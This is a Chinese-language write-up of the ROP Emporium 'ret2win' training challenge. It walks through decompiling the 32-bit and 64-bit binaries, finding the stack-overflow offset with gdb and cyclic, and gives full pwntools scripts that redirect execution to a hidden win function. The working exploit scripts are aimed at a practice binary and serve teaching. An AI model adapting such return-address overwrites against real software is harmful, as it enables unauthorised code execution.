ret2win

ropemporium上的链接
https://ropemporium.com/

32位

checksec ret2win32
只开了NX
运行 ./ret2win32

拖入IDA32位，main函数F5

int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
puts("ret2win by ROP Emporium");
puts("32bits\n");
pwnme();
puts("\nExiting");
return 0;
}

点进去pwnme()

char *pwnme()
{
char s; // [esp+0h] [ebp-28h]
memset(&s, 0, 0x20u);
puts(
"For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\n"
"What could possibly go wrong?");
puts("You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n");
printf("> ");
return fgets(&s, 50, stdin);
}

fgets允许我们输入50个，s的大小有0x28，即40个，再加4个字节覆盖ebp，所以我们可以写入足够的字符进行栈溢出

在左边一堆函数中找到函数ret2win()

那我们是不是只要调到ret2win()函数就可以get flag了
ret2win()的地址是0x08048659

先找一下填充个数
gdb ret2win32
cyclic 200
（复制200个有规律乱码）
r运行
（粘贴有规律乱码）
cyclic -l 0x6161616c（报错地址）

写下脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
local = 1
elf = ELF('./ret2win32')
p = process('./ret2win32')

ret2win = 0x08048659

payload = ''
payload += 'A'*44
payload += p32(ret2win)

'''
payload = ''
payload += 'A'*0x28
payload += p32(0)
payload += p32(ret2win)
'''

p.sendline(payload)
p.interactive()

[*] Got EOF while reading in interactive
虽然不能ls，但是flag已经出来了，结局是好的

64位

道理类似
先checksec然后运行

放入IDA64位

找到后门函数ret2win()

ret2win()地址为0x0400811
gdb找偏移步骤：
gdb ret2win32
cyclic 200
（复制200个有规律乱码）
r运行
（粘贴有规律乱码）
cyclic -l 0x6161616b（报错地址后八位）

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
local = 1
elf = ELF('./ret2win')
p = process('./ret2win')

ret2win = 0x0400811

payload = ''
payload += 'A'*40
payload += p64(ret2win)

'''
payload = ''
payload += 'A'*0x20
payload += p64(0)
payload += p64(ret2win)
'''

p.sendline(payload)
p.interactive()

两个flag都是ROPE{a_placeholder_32byte_flag!}